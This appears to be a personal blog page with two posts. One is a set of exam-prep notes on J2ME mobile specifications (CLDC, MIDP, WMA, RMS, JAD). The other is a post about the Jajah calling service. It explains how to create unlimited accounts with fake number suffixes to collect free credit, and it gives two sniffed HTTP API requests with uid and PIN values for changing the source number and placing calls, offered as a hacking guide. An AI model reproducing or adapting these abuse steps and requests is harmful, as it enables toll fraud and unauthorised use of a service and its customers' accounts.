Saturday, May 12

Sun Certified MAD

I am a Sun Certified Mobile Application Developer. Indeed. I took the exam and passed in December 06. Here are some notes that I had before the exam.

JTWI 1.0 specification

Mandatory:

  • CLDC 1.0 (NOT 1.1)
  • MIDP 2.0
  • WMA 1.1

Note: NO MMAPI 1.1 etc...

Jar file requires:

  • JAR size
  • JAD size
  • RMS size "MIDlet-Data-Size"

Standard size:

  • Jar : 64 KB
  • JAD : 5 KB
  • RMS : 30 KB
  • Heap : 256 KB

Screen:

  • 125x125 with 12 bit color

Requires:

  • SMS Push

CLDC 1.1

  • Min. Volatile memory = 32 KB
  • Does not support: Finalization, JNI and user defined class loader etc...
  • Support: Threads, float, Weak references etc…
  • Derived collection classes from J2SE: Vector, Stack, Hashtable, Enumeration etc..
  • NO ArrayList, Queue etc..

Preverification Process

Will do:

  • Arrange all subroutines in order
  • Augment stackmap
  • Removes certain bytecodes

WMA 1.1

Provide Message Interface:

  • Address
  • Timestamp

JAD FIle
  • Takes precedence over JAR manifest
  • Microedtion-Configuration:
  • Eg. MIDlet-Data-Size: 8888
    • 8888 bytes of RMS space will permanently be reserved for the application.

Connection
  • StreamConnectionNotifier
    • Wait for a StreamConnection to be established
    • Extends Connection
  • Default mode is READ_WRITE

MIDP 2.0

Required protocols

  • Http 1.1 (NOT 1.0)
  • Https

Encoding
  • UTF-8 is NOT the default encoding scheme

RMS
  • Can be shared among multiple MIDlets
  • Use AUTHMODE_ANY to share

Others
  • 5 independent RecordStore
  • 5 simultaneous Timer

High level UI
  • ChoiceGroup has no IMPLICIT type

Security
  • MIDlets in minimum security domain are not prompted for every permission.
  • In JAD, specify "Midlet-permissions" and Midlet Suite must be granted the protection domain with the permission, else it will NOT be installed.
  • In JAD, specify "Midlet-permissions-opt" if the permission in the protect domain is optional. It can be installed if the permission is not avail to the Midlet.
  • X.509 PKI Authentication.

MMAPI
  • 5 states : UNREALIZED, REALIZED, PREFETCHED, STARTED, CLOSED

SMS

  • 160/70 characters depends on encoding


Posted by Junda at 11:21 PM 0 comments

Sunday, May 6

Jajah

Jajah provides a cheap way to call using callback service. No doubt it is a great web/mobile application since it can save a lot of money! But Hoiio is better.

Moment of truth B
Another flaw with Jajah is that it allows user to create unlimited number of accounts with the same mobile number. Too bad they give only $0.25 USD free ):

  1. Register a new account with any name, email and a username that you can remember
  2. Enter your mobile number, but add some suffix
    Eg. If your number is 99998888, then enter 999988881
  3. Repeat with a different suffix
    Eg. 999988882
[Accurate as of Feb 2008]

Moment of truth A
But there are many serious flaws with Jajah. They have no security. Absolutely, zero. We just need to sniff their traffic and we will be able to figure out how to make a call and transfer credit. A very short guide to hacking them. Figure out the rest yourself!

The HTTP queries:
Step1: Change source number
http://www.jajah.com/engine/MobileAPI.aspx?message=mob-number-change;new-number=006597282928;type=mob-HTTP;uid=3021031;PIN=53749467;l=en;pt=0;v=0.3.3

Step2: Call!
http://www.jajah.com/engine/MobileAPI.aspx?message=CALL;dest=006593836208;type=mob-HTTP;uid=3021078;PIN=53749467;l=en;pt=0;v=0.3.3

[Accurate as of August 2007]


Found a Little Bug



Posted by Junda at 10:07 AM 0 comments

Subscribe to: Posts (Atom)